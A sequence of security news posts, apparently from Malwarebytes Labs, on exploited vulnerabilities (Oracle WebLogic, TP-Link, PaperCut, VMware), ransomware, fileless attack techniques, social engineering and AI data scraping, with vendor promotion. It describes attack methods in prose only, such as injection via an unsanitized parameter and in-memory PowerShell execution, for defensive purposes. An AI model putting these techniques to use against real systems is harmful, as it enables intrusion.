IT NEWS

Oracle WebLogic Server vulnerability added to CISA list as “known to be exploited”

On May 1, 2023 the Cybersecurity and Infrastructure Security Agency (CISA) added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

This means that Federal Civilian Executive Branch (FCEB) agencies are obliged to remediate the vulnerabilities by May 22, 2023. For the rest of us it means “pay attention,” everyone else with a vulnerable entity should do this as fast as possible too.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs added by CISA were:

  • CVE-2023-1389 is a vulnerability in TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219. Affected versions contain a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
  • CVE-2021-45046 is a very old Apache Log4j2 deserialization of untrusted data vulnerability that still works on enough unpatched servers to be listed.
  • CVE-2023-21839 affects Oracle WebLogic Server. It can lead to an unauthenticated attacker with network access gaining unauthorized access to “critical data or complete access to all Oracle WebLogic Server accessible data.”

We would like to zoom in on that last vulnerability for a few reasons.

  • First of all because Oracle WebLogic is a very wide-spread java application server and has always been a popular entrance to networks for cybercriminals.
  • The vulnerability is easily exploitable. Even for copycats, since there are proof-of-concepts (PoCs) available and exploits are incorporated in pen-testing tools.
  • The scope of the vulnerability. There is a real risk that a remote, unauthenticated attacker can fully compromise the server in order to steal confidential information, install ransomware, and turn to the rest of the internal network.

Oracle WebLogic Suite is an application server for building and deploying enterprise Java EE applications which is fully supported on Kubernetes. That makes it easy to use on-premises or in the cloud. The companies using Oracle WebLogic are most often found in United States and in the Information Technology and Services industry.

In Oracle’s January security advisory you will notice that five researchers are credited with finding and reporting CVE-2023-21839. This may be due to the fact that Oracle issues patches in a quarterly cycle, where many others publish updates monthly. This means that researchers have more time to find new vulnerabilities, but they also have to keep quiet about them for longer. Nevertheless, five separate instances could indicate that this vulnerability was not hard to find.

What’s even worse is that it is easy to exploit the vulnerability. The published exploits target the Listen Port for the Administration Server. The protocol used with this port is T3—Oracle’s proprietary Remote Method Invocation (RMI) protocol, which transfers information between WebLogic servers and other Java programs. An unauthorized attacker with remote access can send a crafted request to a vulnerable WebLogic server and upload a file via an LDAP server. Basically allowing the attacker to execute reverse shells on the target. A reverse shell or “connect-back” shell opens communications with the attacker and allows them to execute commands, which enables them to take control of the system.

Update now

Affected versions of Oracle WebLogic Server are 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0. A patch for this vulnerability is available on the Oracle support site for those that have an Oracle account.

Oracle always strongly recommends that you do not expose non-HTTPS traffic (T3/T3s/LDAP/IIOP/IIOPs) outside of the external firewall. You can control this access using a combination of network channels and firewalls.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

How to keep your ChatGPT conversations out of its training data

Last week, OpenAI announced it had given ChatGPT users the option to turn off their chat history. ChatGPT is a “generative AI”, a machine learning algorithm that can understand language and generate written responses. Users can interact with it by asking questions, and the conversations users have with it are in turn stored by OpenAI so they can be used to train its machine learning models. This new control feature allows users to choose which conversations to use to train OpenAI models.

“Conversations that are started when chat history is disabled won’t be used to train and improve our models, and won’t appear in the history sidebar,” the company said in the announcement. “When chat history is disabled, we will retain new conversations for 30 days and review them only when needed to monitor for abuse, before permanently deleting.”

Prior incidents involving ChatGPT may have prompted these changes. Early this month, reports revealed Samsung employees had erroneously shared confidential company information with ChatGPT. Before this, OpenAI took ChatGPT offline after it exposed some chat histories to others using the tool at the same time. This incident earned the attention of a data protection agency in Italy, which then ordered a temporary ban for the AI, pending an investigation.

Along with its announcement, OpenAI also revealed a ChatGPT Business subscription that will keep users’ input out of its training data. “ChatGPT Business will follow our API’s data usage policies, which means that end users’ data won’t be used to train our models by default,” the company said.

How to opt out of OpenAI’s trianing data

Log in to ChatGPT and click the three dots next to your name to open a menu.

ChatGPT hamburger menu button

Choose Settings from the menu.

ChatGPT menu

The Settings menu will appear in the middle of the screen. Click Show next to Data Controls to expand the window, and then toggle the switch next to Chat History & Training to the off position to stop your data being used to train ChatGPT.

Users can also export their chat history for local storage by clicking the Export data text in the expanded Settings window. Users will receive an email with a button link to the file containing all of their conversations.

ChatGPT settings menu

Note that disabling Chat History & Training also turns off ChatGPT’s conversation history feature. Chats created after disabling the option won’t appear in the history sidebar, but cached conversations found in the sidebar of the page remain.

ChatGPT chat history is off


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Upcoming webinar: Is EDR or MDR better for your business?

Don’t miss our upcoming webinar on EDR vs. MDR!

In the webinar, Marcin Kleczynski, CEO and co-founder of Malwarebytes, and guest speaker Joseph Blankenship, Vice President and research director at Forrester, discuss topic such as: 

  • The difference between EDR and MDR, how EDR solutions can be challenging for businesses without dedicated security teams, and why building an in-house SOC can be expensive and difficult.
  • The limitations of Endpoint Protection and EDR, specifically when it comes to advanced threats like ransomware that use Living off the Land (LOTL) attacks and fileless malware
  • How MDR providers work with clients to understand their security technology stack, make recommendations, and agree on response actions to take.
  • If EDR or MDR is better for your business based on the resources you have available and the level of security you require. 

Want to learn more about EDR and MDR and which is right for your business? Be sure to catch the full webinar on Wednesday, May 10, 2023 at 10 am PT / 1 pm ET and get valuable insights from industry experts on how to improve your security operations and protect against ransomware and fileless malware.

Register now!

Read also:

How to choose an MDR vendor: 6 questions to ask

Is an outsourced SOC worth it? Looking at the ROI of MDR

Cyber threat hunting for SMBs: How MDR can help

Is it OK to train an AI on your images, without permission?

Website owners are once again at war with tools designed to scrape content from their sites.  An AI scraper called img2dataset is scouring the Internet for pictures that can be used to train image-generating AI tools.

These generators are increasingly popular text-to-image services, where you enter a suggestion (“A superhero in the ocean, in the style of Van Gogh”) and it produces a visual to match. Since the system’s “understanding” of images is a direct result of what it was trained on, there is an argument that what it produces consists of bits and pieces of all that training data, There’s a good chance there may be legal issues to consider, too. This is a major point of contention for artists and creators of online content generally. Visual artists don’t want their work being sucked up by AI tools (that make someone else money) without permission.

Unfortunately for the French creator of img2datset, website owners are very much dissatisfied with his approach to harvesting images. 

The free program “turns large sets of image URLs into an image dataset”. Its claimed the tool can “download, resize, and package 100 million URLs in 20 hours on one machine”. That’s a lot of URLs.

What’s aggravating site owners is that the tool is ignoring assumed good netiquette rules. Way back in 1994, “robots.txt” was created as a polite way to let crawlers know which bits of a website they were allowed to pay a visit to. Search engines could be told “Yes please”. Other kinds of crawlers could be told “No thank you”. Many rogues would simply ignore a site’s robots.txt file, and end up with a bad reputation as a result.

This is one of the main complaints where img2dataset is concerned. Website owners contend that it’s not physically possible to have to tell every tool in existence that they wish to opt-out. Rather, the tool should be opt-in. This is a reasonable concern, especially as site owners would essentially be responsible for adding ever more entries to their code on a daily basis.

One site owner had this to say, in a mail sent to Motherboard:

I had to pay to scale up my server, pay extra for export traffic, and spent part of my weekend blocking the abuse caused by this specific bot.

Elsewhere, you can see a deluge of complaints from site owners on the tool’s “Issues” discussion page. Issues of consent, custom headers, even talk of the creator being sued: It’s chaos over there.

If you’re a site owner who isn’t keen on img2dataser paying a visit, there are a number of ways you can tell it to keep a respectful distance. From the opt-out directives section:

Websites can use these http headers:” X-Robots-Tag: noai”, “X-Robots-Tag: noindex” , “X-Robots-Tag: noimageai”, and “X-Robots-Tag: noimageindex”. By default, img2dataset will ignore images with such headers.

However, the FAQ also says this for users of the img2dataset tool:

To disable this behaviour and download all images, you may pass “–disallowed_header_directives ‘[]’”

This does exactly what it suggests, ignoring the “please leave me alone” warning and grabbing all available images. It’s no wonder, then, that website owners are currently so hot and bothered by this latest slice of website scraping action. With little apparent interest in robots.txt from the creator, and workarounds to ensure users can grab whatever they like, this is sure to rumble on.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A week in security (April 24 -30)

Last week on Malwarebytes Labs:


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

How to protect your small business from social engineering

When Alvin Staffin received an email from his boss, he didn’t question it. In the email, Gary Bragg, then-president of Pennsylvania law firm O’Neill, Bragg & Staffin, asked Staffin to wire $580,000 to a Bank of China account. Staffin, who was VP and in charge of banking, sent the money through as asked. An hour later, he realized the request was fraudulent—he hadn’t been contacted by Bragg at all.

A hacker had gained access to Bragg’s email account and used it, along with information they’d learned about an ongoing loan transaction, to pose as Staffin’s boss. Nothing in the exchange made Staffin suspect that something was off until he called Bragg, who was out of town at the time, to discuss the transfer.

Both Staffin and his employer were victims of business email compromise (BEC), also known as CEO fraud, a type of social engineering attack. Social engineering attacks are cyberattacks where a criminal tricks a victim into doing something against their interests, such as revealing sensitive information of making a bank transfer.

BEC is one of the most damaging forms of social engineering attacks faced by small businesses. In the 2022 Internet Crime Report, the FBI ranked it as the second most damaging fraud, in terms of financial losses, after investment fraud.

The common forms of social engineering used by criminals are pretexting, phishing, baiting, and tailgating. Pretexting involves creating a false identity and situation to trick victims into providing information or access (BEC is a form of pretexting). Phishing attacks try to trick victims into giving away sensitive information, such as login credentials, using emails and websites designed to look like they belong to a person or business the victim trusts, such as their bank. Baiting is when malware-infected devices, such as USB sticks, are left in public places, in the hope that victims will take them and use them. Lastly, tailgating is when a fraudster follows an authorized person into a restricted area without proper authorization.

Protecting your business from social engineering

Securing a small business from social engineering attacks is an ongoing effort that requires constant vigilance. Because social engineering relies on a criminal’s powers of persuasion, your staff’s vigilance is your first line of defence. Security software forms a vital second line, protecting your business from some social engineers’ tools, such as phishing sites, and from social engineering attacks designed to deliver malware.

Your first priority should be to empower employees to be confident in identifying and effectively responding to social engineering tactics.

  • Run regular training to help employees understand how to properly recognize and respond to social engineering. Consider testing your staff, too, and follow up with further education for anyone who fails the test.
  • Use at least two people for financial transactions. Social engineering attacks try to isolate and hurry staff so they act without thinking. Create checks in your processes to prevent that.
  • Create an intentional culture of security so that security practices come naturally to your staff. Encourage people to report suspicious activity sooner rather than later, avoid punishing staff who fall for social engineering so that others are not afraid to be accountable, and lead by example.
  • Use endpoint security to protect against the effects of baiting attacks, to block phishing sites, and to detect malware delivered by social engineering.
  • Monitor threat intelligence to understand current and emerging threats that could affect your business.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Microsoft: You’re already using the last version of Windows 10

Microsoft issued a client roadmap update on Thursday to remind us once again that Windows 10 support is slowly coming to an end. In less than three years, all Windows 10 users will need to have moved to Windows 11. While moving to Windows 11 should be a win for security, some Windows 10 fans may be a little nervous. Upgrading isn’t always straightforward, and exacting hardware requirements weigh heavily on Windows 11.

According to the update, the company intends the current version of Windows 10, version 22H2, to be the last edition of the operating system (OS). That meant no more new and significant features for Windows 10. Instead, interesting changes and enhancements will be incorporated into Windows 11. PCMag highlighted that this process is already underway.

Microsoft will continue to release monthly security updates for Windows 10 until October 14, 2025. After that, it will officially pull the plug for consumer users but not for organizations signed up to the Long Term Servicing Channel. Support for them will extend beyond the deadline for up to 10 years. From Microsoft’s description:

The Long-Term Servicing Channel (LTSC) is designed for Windows 10 devices and use cases where the key requirement is that functionality and features don’t change over time. Examples include medical systems (such as those used for MRI and CAT scans), industrial process controllers, and air traffic control devices. We designed the LTSC with these types of use cases in mind, offering the promise that we will support each LTSC release for 10 years–and that features, and functionality will not change over the course of that 10-year lifecycle.

Microsoft recommends Windows 10 users switch to Windows 11 if they haven’t already done so. Despite that, Windows 10 remains hugely popular, with a 69 percent share of Windows desktops, globally. Windows 11 trails significantly with just 18 percent, not far off Windows 7, which still accounts for nine percent.

Windows 11’s low numbers may soon change as the sunset date approaches, which would be good news for security. Microsoft’s latest OS makes multiple improvements over what’s available in Windows 10. Microsoft’s approach has been to create a chain of trust that ensures the integrity of the entire hardware and software stack, from the ground up. Many of the links in that chain rely on Virtualization Based Security (VBS), a technology that creates secure sandboxes isolated from the main OS. Doing that requires hardware-based virtualization features, which is why Windows 11 has such stringent hardware requirements.

Windows 11 also includes a more efficient way of warding off phishing attacks; warnings when users type passwords into notepad files and other programs; and a default account lockout policy to combat the dangers of Remote Desktop Protocol (RDP) brute force attacks, an automated attack wherein hackers try to guess a users’ passwords remotely, over RDP.

And, soon, Windows 11 will allow app developers to tap into its built-in human presence detection (HPD) capabilities to create and share unique experiences. HPD is a new feature that allows touch-free logins of laptops. It also automatically locks the device when a user walks away from it, giving them much-needed privacy. Of course, this feature can only be used if your laptop has the hardware to support it.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Update now: Critical flaw in VMWare Fusion and VMWare Workstation

Four vulnerabilities in virtualisation software have been fixed by VMware, including two which were exploited at the 20223 Pwn2Own contest. Three have been given the severity rating “Important”, with the last (CVE-2023-20869) is classed as “Critical”.

The four vulnerabilities are:

  • CVE-2023-20869 is “Critical” flaw that affects Fusion and Workstation. It is a stack-based buffer overflow issue in the functionality for sharing host Bluetooth devices with the virtual machine. As per the advisory, “A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine’s VMX process running on the host.” Needless to say, guest VMs are not supposed to be able to make the host machines they’re running on do things.
  • CVE-2023-20870 is an “Important” flaw that affects Fusion and Workstation. It’s another issue in the functionality for sharing host Bluetooth devices, but with this one an attacker can potentially read privileged information stored in the virtual machine’s hypervisor memory.
  • CVE-2023-20871 is an “Important” flaw that only affects Fusion. It allows an attacker who has read / write access to the host operating system to elevate their privileges to gain root access to the host operating system.
  • CVE-2023-20872 is an “Important” flaw that affects Fusion and Workstation. It allows virtual machines with a physical CD/DVD drive attached to execute code on the hypervisor, if the drive is configured to use a virtual SCSI controller.

Workarounds and updates

All four issues can be addressed by updating to the latest version of the affected software. At the time of writing these are VMware Fusion 13.0.2 and VMware Workstation 17.0.2. Workarounds are available for CVE-2023-20869, CVE-2023-20870, and CVE-2023-20872.

CVE-2023-20869 and CVE-2023-20870 can be mitigated by turning off Bluetooth support by unchecking the “Share Bluetooth devices with the virtual machine” option. The relevant support documents for each product are VMware Workstation Pro, VMware Workstation Player, and VMware Fusion.

CVE-2023-20872 can be mitigated by removing the CD/DVD device from the virtual machine. Alternatively, you can configure the virtual machine so that it does not use a virtual SCSI controller. After shutting down the virtual machine, the steps are:

To remove the CD/DVD device in VMWare Workstation:

  • Select VM > Settings
  • Click the Hardware tab
  • Select the CD/DVD and click Remove

To remove the CD/DVD device in VMWare Fusion:

  • Select a virtual machine in the Virtual Machine Library window
  • Click on Virtual Machine menu
  • Click Settings
  • Under Removable Devices in the Settings window, select CD/DVD > Advanced Options > Remove CD/DVD Drive.

To configure VMWare Workstation not to use a virtual SCSI controller:

  • Select VM > Settings
  • Click the Hardware tab
  • Select the CD/DVD > Advanced > CD/DVD Advanced Settings > Virtual device node
  • You can configure the Bus type

To configure VMWare Fusion not to use a virtual SCSI controller:

  • Select a virtual machine in the Virtual Machine Library window
  • Click on Virtual Machine menu
  • Click on Settings
  • Under Removable Devices in the Settings window, Select CD/DVD > Advanced options > Bus type
  • You can configure the Bus type.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

LockBit and Cl0p ransomware gangs actively exploiting Papercut vulnerabilities

A few days ago we wrote about two vulnerabilities found in PaperCut application servers. As we noted, exploitation was fairly simple so there was some urgency to install the patches. My esteemed colleague Chris Boyd literally wrote:

“Arbitrary code can be deployed, or even ransomware if that’s part of the attacker’s toolkit.”

As it turns out, there are already two flavors of ransomware preying on those that haven’t updated yet.

A Cl0p affiliate, branded as DEV-0950 by Microsoft has already incorporated the PaperCut exploits into its attacks. This affiliate has also been known to use the GoAnywhere zero-day that basically brought Cl0p back from the dead last month.

In a surprising turn of events for the ransomware landscape, Cl0p emerged as the most used ransomware in March 2023, coming out of nowhere to dethrone the usual frontrunner, LockBit.

Known ransomware attacks in March 2023, listed by gang
Known ransomware attacks in March 2023, listed by gang

But don’t rule the habitual frontrunner LockBit out just yet. Microsoft Threat Intelligence said in a tweet that it’s “monitoring other attacks also exploiting these vulnerabilities, including intrusions leading to Lockbit deployment.”

PaperCut is printing management software that works by intercepting print jobs as they pass into a print queue. It’s used by large companies, state organizations, and education institutes because it is compatible with all major printer brands and platforms. This makes a vulnerability, especially one that is as easy to exploit, a virtual goldmine for ransomware peddlers, and puts a bullseye on anyone that is running an unpatched server.

Both the underlying vulnerabilities have been addressed with patches. If you update your PaperCut application servers, you are no longer at risk. From the Updating FAQ:

  • Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the Admin interface > About > Version info > Check for updates) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.
  • If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

If you’re unable to upgrade, PaperCut advises the following:

  • Block all inbound traffic from external IPs to the web management port (port 9191 and 9192 by default)
  • Block all traffic inbound to the web management portal on the firewall to the server. Note: this will prevent lateral movement from internal hosts but management of the PaperCut service can only be performed on that asset.
  • Apply “Allow list” restrictions under Options > Advanced > Security > Allowed site server IP addresses. Set this to only allow the IP addresses of verified Site Servers on your network. Note this only addresses ZDI-CAN-19226 / PO-1219.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Fileless attacks: How attackers evade traditional AV and how to stop them

When you hear about malware, there’s a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks—and while they can be bad, they’re nothing compared to their fileless cousins.

As the name suggests, fileless attacks don’t rely on traditional executable files to get the job done but rather in-memory execution, which helps them evade detection by conventional security solutions.

In this post, we’ll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.

Fileless attacks explained

In contrast to file-based attacks that execute the payload in the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). Executing malicious code directly into memory instead of the hard drive has several benefits, such as:

  • Evasion of traditional security measures: Fileless attacks bypass antivirus software and file signature detection, making them difficult to identify using conventional security tools.   
  • Increased potential for damage: Since fileless attacks can operate more stealthily and with greater access to system resources, they may be able to cause more damage to a compromised system than file-based attacks.
  • Memory-based attacks can be difficult to remediate: Since fileless attacks don’t create files, they can be more challenging to remove from a system once they have been detected. This can make it extra difficult for forensics to trace an attack back to the source and restore the system to a secure state.

Fileless attacks vs Living-off-the-land (LOTL) attacks

If you read our article on LOTL attacks, you may be confused: Aren’t fileless attacks and LOTL attacks the same thing? Well, yes and no.

LOTL attacks are anytime an attacker leverages legitimate tools to evade detection, steal data, and more, while fileless attacks refer purely to executing code directly into memory. While both types of attacks often overlap, they are not synonymous.

Think of fileless attacks as an occasional subset of LOTL attacks. Fileless attacks can and often do leverage LOTL techniques to execute payload into memory, but they can also do so without leveraging a legitimate system tool or process at all.

easset upload file41982 264446 ePowerShell script extracted from a Microsoft Word document. If macros are enabled, it would execute the code in memory upon being opened. Source.

For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).

On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but doesn’t qualify as LOTL as it doesn’t use a legitimate system tool or process.

5 different ways fileless attacks execute code in memory

Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.

Below are five common techniques used in fileless attacks:

  • PowerShell: A legitimate scripting that can execute malicious code directly in memory. As mentioned earlier, this technique overlaps with LOTL attacks as it leverages a built-in system tool.
  • Process hollowing: Process hollowing is a fileless technique where attackers create a new process in a suspended state, replace its memory content with malicious code, and then resume the process. The malicious code executes in memory without writing to the disk.
  • Reflective DLL injection: In this fileless attack, attackers load a malicious Dynamic Link Library (DLL) into a legitimate process’s memory without writing it to the disk. The DLL is executed directly in memory, evading detection by traditional security software.
  • JavaScript and VBScript: Fileless attackers can use JavaScript or VBScript to run malicious code directly in memory within a web browser or other applications that support these scripting languages.
  • Microsoft Office macros: Fileless attackers can use malicious macros embedded in Microsoft Office documents to execute code in memory when the document is opened. This method takes advantage of the legitimate macro functionality, making it an example of an LOTL technique as well.

Note that fileless attacks often rely on exploiting vulnerabilities in system components in each of these instances (such as Office or web-browsers) to execute their code. 

Preventing and spotting fileless attacks: Quick tips

Prevention Method Description
Keep software and systems updated Regularly update your operating systems, applications, and security software to patch vulnerabilities that could be exploited by fileless attackers.
Regularly review security logs Examine security logs for unusual activity or patterns that could indicate a fileless attack, such as unexpected PowerShell usage or excessive network connections.
Employ behavioral analytics Use advanced threat detection tools that employ behavioral analytics to identify and block fileless attacks based on their unique behavior patterns.
Restrict macro usage Limit the use of Microsoft Office macros by disabling them or allowing only digitally signed and trusted macros.

Malwarebytes EDR and Exploit Protection: Safeguarding against fileless attacks

Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.

To configure Exploit Protection Advanced settings, follow these steps:

  • Go to Configure > Policies in Nebula.

  • Select a policy and navigate to Protection settings > Advanced settings > Anti-exploit settings.

easset upload file11108 264446 eExploit Protection settings in a policy in Malwarebytes EDR.

Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:

  • Application Hardening: By enforcing security measures like DEP and ASLR, and disabling potentially vulnerable components like Internet Explorer VB Scripting, Application Hardening reduces the attack surface and makes it more difficult for fileless malware to exploit weaknesses in applications.
  • Advanced Memory Protection: This layer prevents fileless malware from executing payload code in memory by detecting and blocking techniques such as DEP bypass, memory patch hijacking, and stack pivoting, thereby stopping the attack before it can cause harm.
  • Application Behavior Protection: This layer also detects and blocks exploits that do not rely on memory corruption, such as Java sandbox escapes or application design abuse exploits. Options include Malicious LoadLibrary Protection, Protection for Internet Explorer VB Scripting, Protection for MessageBox Payload, and protection against various Microsoft Office macro exploits. 
  • Java Protection: These settings protect against exploits commonly used in Java programs. By guarding against Java-specific exploits, such as web-based Java command execution and Java Meterpreter payloads, Java Protection can effectively prevent fileless attacks that leverage Java vulnerabilities to infiltrate systems and execute malicious code.

Fighting fileless threats with Malwarebytes EDR: Configuring Suspicious Activity Monitoring in Nebula

Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.

To enable Suspicious Activity Monitoring in your policy:

  • Log in to your Nebula console.
  • Navigate to Configure > Policies.
  • Click “New” or select an existing policy.
  • Choose the “Endpoint Detection and Response” tab.
  • Locate “Suspicious Activity Monitoring” and enable it for the desired operating systems.

easset upload file4634 264446 eSuspicious Activity monitoring detections in Nebula showing a possible fileless attack. On the right, we see the command line context for this process in our organization.

Advanced Settings offer additional options for activity monitoring. To configure these settings:

  • In the same “Endpoint Detection and Response” tab, find the “Advanced Settings” section.
  • Enable “Server operating system monitoring for suspicious activity” to extend monitoring to server operating systems. 
  • Enable “Very aggressive detection mode” to apply a tighter threshold for flagging processes as suspicious. 
  • Toggle “Collect networking events to include in searching” to ON (default) or OFF, depending on your preference. Turning it OFF decreases traffic sent to the cloud.

Flight Recorder Search

Flight Recorder Search collects all endpoint events within its search functionality. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can effectively counter fileless malware threats by monitoring processes, registry, file system, and network activity on the endpoint. 

Respond to fileless attacks quickly and effectively

Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection. 

Stop fileless attacks today